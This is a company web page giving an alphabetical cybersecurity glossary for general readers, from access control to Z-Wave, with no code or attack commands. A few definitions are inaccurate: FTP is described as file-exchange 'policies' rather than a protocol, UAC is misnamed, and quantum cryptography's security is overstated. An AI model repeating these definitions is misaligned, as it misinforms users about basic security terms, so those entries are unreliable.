Welcome to ‘Inside Traffic’s’ comprehensive Cybersecurity Glossary. In our ongoing commitment to empower businesses and individuals with the knowledge to navigate the evolving digital landscape, we’ve compiled a robust list of terms, concepts, and definitions that shed light on the vast world of cybersecurity.

With all its innovations and advancements, the digital age has also brought about complex challenges. Cyber threats are an ever-present danger in our interconnected world, making it vital for businesses and individuals to stay informed about cybersecurity principles and best practices. Whether you’re a seasoned IT professional, a business owner, an aspiring student passionate about creating a career in cybersecurity, or someone who uses technology daily, understanding these terms can be invaluable.
Our glossary is designed to be both comprehensive and accessible, serving as a starting point for those new to cybersecurity and as a refresher for experienced professionals. This glossary spans the breadth of cybersecurity knowledge from common threats like ‘Malware’ and ‘Phishing’ to advanced concepts like ‘Advanced Persistent Threat’ and ‘Zero-Day Attack’.

Before delving into the terms, remember that the cybersecurity field is ever-evolving. As threats grow and change, so do our language and understanding. While this glossary provides a snapshot of key terms as of 22 October 2023, we encourage readers to stay updated with the latest advancements in the field. Recognising the dynamic nature of the cybersecurity landscape, we are committed to regularly updating this glossary to reflect the latest terms, trends, and developments. So, while you’ll find a plethora of information here today, be sure to revisit periodically to stay abreast of the most recent additions and revisions.

At Inside Traffic, knowledge is power, and by understanding the terms and concepts in this glossary, you’re taking a proactive step towards safeguarding your digital assets. Let’s dive in and demystify the intricate world of cybersecurity together.

A

• Access control: The process of restricting access to computer systems and networks to authorised individuals.
• Adware: Software that displays unwanted advertisements on a user’s computer.
• Advanced persistent threat (APT): A type of cyberattack in which the attacker gains unauthorised access to a computer system or network and remains undetected for a long period of time.
• Air gapping: The practice of isolating a computer system or network from the internet and other networks in order to protect it from cyberattacks.
• Anomaly detection: A security technique that uses machine learning to identify unusual activity that may indicate a cyberattack.
• Antivirus: Software that prevents, identifies, and removes viruses and other malicious software from your computer.
• Application programming interface (API): A set of rules that define how software components can interact with each other. APIs can be used to expose data and functionality to external developers, but attackers can also exploit them to gain unauthorised access to systems and data.
• Asset management: The process of identifying, tracking, and managing all of the assets in an organisation, including hardware, software, data, and people.
• Attack vector: Any technique a hacker uses to access or harm a system.
• Authentication: The process of verifying the identity of a user, device, or system.

B

• Backdoor: A hidden entrance to a computer system or network that unauthorised individuals can use to gain access.
• Backup: A copy of data that can be used to restore the data if lost or damaged.
• Biometrics: Authentication methods that use a person’s unique physical characteristics, such as fingerprints, facial features, or iris scans.
• Botnet: A network of computers that have been infected with malware and can be controlled by a remote attacker.
• Bring your own device (BYOD): A policy allowing employees to use their personal devices for work purposes. BYOD can introduce security risks, but there are steps that organisations can take to mitigate these risks.
• Brute Force Attack: An attack where every possible combination is tried to gain unauthorised access.
• Bug: An unintended software or hardware problem, ranging from minor glitches to severe issues that render a system inoperable.
• Business continuity planning (BCP): The process of developing a plan to ensure that an organisation can continue to operate in the event of a disruption, such as a cyberattack or natural disaster.

C

• Certificate authority (CA): An organisation that issues digital certificates, which are used to verify the identity of websites and other entities.
• Cipher: A mathematical algorithm used to encrypt and decrypt data.
• Click fraud: Scammers generate revenue using fake clicks, sometimes hiring individuals to click on ads from multiple devices.
• Cloud computing: The delivery of computing services over the internet.
• Cloud security: The practice of protecting data and applications in the cloud. Cloud security is important because it offers many benefits, such as scalability and agility, but it also introduces new security risks.
• Compliance: Ensuring an organisation’s systems and processes meet all applicable regulations. Cybersecurity compliance is important because it helps organisations to protect their customers’ data and avoid costly fines and penalties.
• Containerisation: A virtualisation technology that allows developers to package applications and their dependencies into isolated units called containers. Containers can be deployed on any platform that supports the container runtime, making them ideal for cloud computing and microservices architectures. However, containerisation also introduces new security challenges.
• Cryptography: The practice of protecting information by making it unreadable to unauthorised individuals.
• Cyberattacks: Attempts by hackers to damage, destroy, or access sensitive information in a computer system.
• Cyber Espionage: The use of computer networks to gain unauthorised access to sensitive information, often for spying, economic gain, or political motivations.

D

• Data breach: The unauthorised access or theft of sensitive data.
• Data loss prevention (DLP): A set of technologies and practices to prevent sensitive data from being lost, stolen, or misused. DLP can be used to monitor and control data movement within and outside of an organisation.
• Dark web: A hidden part of the internet that is not accessible through traditional search engines. The dark web is often used for illegal activities like cybercrime and drug trafficking.
• DDoS (Distributed Denial of Service): A cyberattack that overwhelms services by flooding them with traffic from multiple sources.
• Decryption: Converting coded or encrypted data back into its original form.
• Defence-in-depth: The strategy of using multiple layers of security to ensure backup protection if one layer fails.
• Deepfake: A synthetic media that uses artificial intelligence to create fake videos or audio recordings that are difficult to distinguish from the real thing. Deepfakes can be used maliciously, such as spreading misinformation or blackmailing people.
• Denial-of-service (DoS) attack: An attack that attempts to make a computer system or network unavailable to its intended users.
• Detection Deficit: The time gap between when an attack occurs and when it’s discovered.
• Digital signature: A cryptographic technique used to authenticate the identity of the sender of a message and ensure that the message has not been tampered with.
• Domain: A group of connected computers sharing account information and security policies managed by a domain controller.

E

• Encryption: The process of converting data into a format that authorised individuals can only read.
• Endpoint: A physical device, like mobile phones or desktop computers, connected to a computer network.
• Endpoint security: Security measures implemented on individual devices, such as computers, smartphones, and tablets. Endpoint security is important because it protects devices from malware, phishing attacks, and other threats.
• Endpoint Detection and Response (EDR): A solution that continually monitors and counteracts potential threats in endpoint devices.
• Ethical hacking: Using hacking techniques to identify and fix security vulnerabilities in computer systems and networks. Ethical hackers are also known as white hat hackers.
• Evil Twin: A fraudulent Wi-Fi access point miming a legitimate Wi-Fi network, allowing attackers to eavesdrop and collect sensitive data.

F

• Firewall: A network security device that monitors and controls incoming and outgoing network traffic based on predetermined security policies. Firewalls can block malicious traffic and protect internal networks from attack.
• Firmware: Software that is embedded in hardware devices. Firmware updates are important for security because they can patch vulnerabilities in the firmware.
• Fraud: The act of deceiving someone to obtain money or other benefits.
• File Transfer Protocol (FTP): Policies organisations use to regulate and secure file exchanges.

G

• Gateway: A network point that acts as an access point to another network.
• Governance: The set of rules and procedures used to manage a computer system or network. Cybersecurity governance is important because it helps organisations ensure effective cybersecurity policies and procedures.
• Grey Hat Hacker: Someone who sometimes acts legally, sometimes not, but without malicious intent.
• Guessing Entropy: A measure of how many attempts a hacker might need to guess a password or another unknown variable.

H

• Hacker: A person who uses computers to gain unauthorised access to data.
• Hardening: Configuring a computer system or network to enhance its security. This can include steps such as disabling unnecessary services, changing default passwords, and installing security updates.
• Hash function: A mathematical algorithm that converts data into a unique fingerprint, often used in data verification and password storage.
• Honeynet: A decoy network set up to lure attackers and collect information about their activities.
• Honeypot: A decoy system designed to attract cyber attackers, allowing defenders to detect, deflect, or study hacking attempts.
• Human-factor engineering: The practice of designing systems and interfaces to be intuitive, aiming to minimise the risk of human error.

I

• Identity and access management (IAM): A set of processes and technologies to manage user identities and provide access to systems and resources. Ensuring only authorised users have access to sensitive data and systems bolsters security.
• Identity Theft: The fraudulent acquisition and use of another individual’s private identifying information, typically for financial gain.
• Incident response: The methodology of responding to and managing a cybersecurity incident. This includes identifying the scope, containing the damage, eradicating the threat, recovery, and learning from the event.
• Information security (InfoSec): The discipline dedicated to protecting information from unauthorised access, use, disclosure, disruption, modification, or destruction. This encompasses various activities such as cybersecurity, risk management, and compliance.
• Infrastructure as code (IaC): The technique of using code or scripts to define and deploy IT infrastructure, ensuring consistency and repeatability.
• Intrusion Detection System (IDS): A technology or system that observes network traffic for suspicious behaviour and alerts administrators about potential breaches or malicious activity.
• Internet of Things (IoT): Refers to the expansive network of physical devices, vehicles, appliances, and more that connect and exchange data over the internet.
• IP Spoofing: The practice of disguising the source of IP packets, making it challenging to determine their origin.
• IP Packet: A unit of data that carries the required information for transmitting data between devices over a network.
• IP Address: A unique string of numbers associated with a computer used for identification on a network.

J

• Job rotation: The practice of periodically rotating employees to different jobs in order to reduce the risk of fraud and conspiracy. Job rotation can also be used to reduce the risk of human error in security-sensitive roles.
• Jailbreaking: The process of removing software restrictions from devices, potentially exposing them to vulnerabilities.

K

• Key management: The method of creating, distributing, storing, and utilising cryptographic keys. Effective key management is crucial for ensuring the confidentiality and integrity of encrypted data.
• Keylogger: Surveillance software or malware that records a user’s keystrokes. This can be used maliciously to capture passwords, personal details, or other sensitive information.
• Known Vulnerability Scanner: A specialised tool that probes computer systems and networks for recognised security vulnerabilities, assisting administrators in identifying and rectifying potential weaknesses.

L

• Least privilege: A security principle that advocates granting users only the permissions required to carry out their designated tasks. Minimising the access rights of each user limits the potential damage from security breaches.
• Logic Bomb: A malicious code deliberately inserted into software that gets activated when specific conditions are fulfilled. Such code can result in harmful actions like data corruption or system crashes.
• Log management: The systematic approach of collecting, storing, and scrutinising system logs. This process aids in detecting and investigating unusual or potentially malicious activity.

M

• Malware: Software crafted with the intent to harm or exploit any device, network, service, or software application. Examples of malware include viruses, worms, Trojan horses, ransomware, and spyware.
• Multi-factor authentication (MFA): A security protocol requiring users to verify their identity using multiple methods of authentication. Typically, MFA combines something the user knows (like a password), something the user has (like a mobile device to receive a verification code), and sometimes something the user is (like a fingerprint or facial recognition). By implementing MFA, security is enhanced as it offers a layered defence against unauthorised access.
• Malicious Code: Code intended to harm, expose vulnerabilities, or threaten a system’s security.

N

• Network Security: The set of measures, policies, and practices employed to safeguard computer networks from unauthorised access, attacks, and damage. These protective steps can include the use of firewalls, intrusion detection systems, access control lists, and regular security assessments, among other tools and tactics.
• Network Traffic Visibility: Refers to the capability to monitor, analyse, and gain insights from the data travelling across a network. It provides organisations with a clear understanding of what’s happening on their networks in real-time, helping to detect security threats, troubleshoot issues, and optimise performance. Effective network traffic visibility is essential for proactive threat detection and for ensuring that security tools are working efficiently.

O

• OAuth: An open standard for token-based authentication and authorisation, commonly used as a way for Internet users to grant websites or applications access to their information without giving away passwords.
• Open-source software: Software that is distributed with its source code, allowing anyone to inspect, modify, and enhance the code. The transparency of open-source software can often lead to rapid vulnerability detection and patching by the community.
• Operational security (OpSec): The practice of protecting sensitive information from unauthorised disclosure, ensuring that adversaries or competitors do not gain insight into planned actions or activities.
• Operating System: System software that manages computer resources and processes.

P

• Patch management: The process of installing security patches to fix known vulnerabilities in computer systems and software. Regular patching helps safeguard systems from potential threats that exploit known vulnerabilities.
• Penetration testing: The practice of simulating cyberattacks on computer systems, networks, or applications to identify vulnerabilities that could be exploited by malicious actors. It’s a proactive approach to discovering security flaws before they can be exploited.
• Phishing: A cybercrime in which targets are contacted, typically via email, posing as a legitimate entity to deceive individuals into providing sensitive data, such as passwords, credit card numbers, or personal identification information.
• Programming: The process of instructing a computer to perform tasks by writing code in a language the computer can understand.

Q

• Quantum cryptography: A type of cryptography that uses the principles of quantum mechanics to secure communications. Quantum cryptography is more secure than traditional cryptography because it is resistant to attacks by even the most powerful computers.

R

• Ransomware: A type of malware that encrypts a victim’s data and demands a ransom payment in exchange for the decryption key.
• Risk assessment: The process of identifying, analysing, and evaluating cybersecurity risks. Risk assessments are important for security because they help organisations prioritise their security efforts and make informed decisions about how to allocate their resources.
• Rootkit: A type of malicious software that provides root or privileged access to a computer while concealing its presence.
• Remote Access: Gaining access to a computer or network from a remote location.

S

• Social engineering: A type of cyberattack that relies on human manipulation to trick victims into revealing sensitive information or performing actions that compromise security.
• Security awareness training: Training that teaches employees about cybersecurity risks and how to avoid them. Security awareness training is important for security because it helps to reduce the risk of human error, which is a leading cause of cybersecurity incidents.
• Security information and event management (SIEM): A system that collects and analyses security logs from multiple sources in order to detect and investigate suspicious activity. SIEM systems can help organisations to identify and respond to cybersecurity incidents more quickly and effectively.
• Software development lifecycle (SDLC): The process of developing software in a secure manner. The SDLC should include security activities at all stages of the development process, from requirements gathering to deployment.
• Supply chain security: The practice of protecting information systems and software from vulnerabilities that could be exploited by attackers who gain access to the supply chain. Supply chain security is important because organisations are increasingly reliant on third-party suppliers for software and hardware.
• Spyware: Software that enables a user to obtain covert information about another’s computer activities by transmitting data covertly from their hard drive.
• SQL Injection: A type of attack that seeks to execute malicious SQL statements in a database.
  Security Policy: Organizational rules and guidelines regarding computer network security.
• Security Operations Center (SOC): A centralised team and location that deals with security issues and incidents.

T

• Threat modelling: The process of identifying and analysing potential threats to a computer system or network. Threat modelling can help organisations to develop security controls to mitigate those threats.
• Trojan horse: A program that appears harmless but is, in fact, malicious. Attackers have used Trojan horses to deliver malicious software. A type of malware that disguises itself as a legitimate program in order to trick users into installing it. Once installed, Trojan horses can give attackers access to a victim’s computer or network.
• Two-Factor Authentication (TFA): A security process requiring two forms of identification, typically something known (a password) and something possessed (a smartphone or token).

U

• User access control (UAC): A security measure that prevents users from making changes to system settings without administrator privileges. UAC can help to reduce the risk of users accidentally or maliciously compromising the security of a system.
• URL Filtering: The practice of blocking access to certain websites based on the web address.

V

• Vulnerability: A weakness in a computer system or software that can be exploited by attackers. Vulnerabilities can be caused by software bugs, configuration errors, or physical security weaknesses.
• Virus: A piece of code which is capable of copying itself and typically has a detrimental effect, such as corrupting the system or destroying data.
• VPN (Virtual Private Network): A secure connection between private networks over the internet.

W

• Web application firewall (WAF): A security device that monitors and controls incoming and outgoing web traffic. WAFs can help to protect web applications from attacks such as SQL injection, cross-site scripting, and denial-of-service attacks.
• White hat hacker: A security professional who uses hacking techniques to identify and fix security vulnerabilities in computer systems and networks. White hat hackers are also known as ethical hackers.
• Worm: A standalone malware computer program that replicates itself in order to spread to other computers.
• Whitelisting: Granting permission to authorised software or users while denying all others by default.

X

• XSS (Cross-Site Scripting): A type of attack where malicious scripts are injected into trusted websites.

Y

• YARA: A tool used in malware research and detection which allows for the creation of descriptions of malware families based on textual or binary patterns.

Z

• Zero-day attack: An attack that exploits a vulnerability that is unknown to the software vendor. Zero-day attacks are difficult to defend against because no patch is available to fix the vulnerability.
• Z-Wave: Z-Wave is a wireless communication protocol primarily designed for home automation. It allows various smart devices within the home (such as lights, thermostats, door locks, and security sensors) to communicate and be controlled remotely. Z-Wave is designed to be a low-power technology, making it ideal for battery-operated devices. Z-Wave supports strong encryption for secure communication between devices. This is particularly important for devices like smart locks.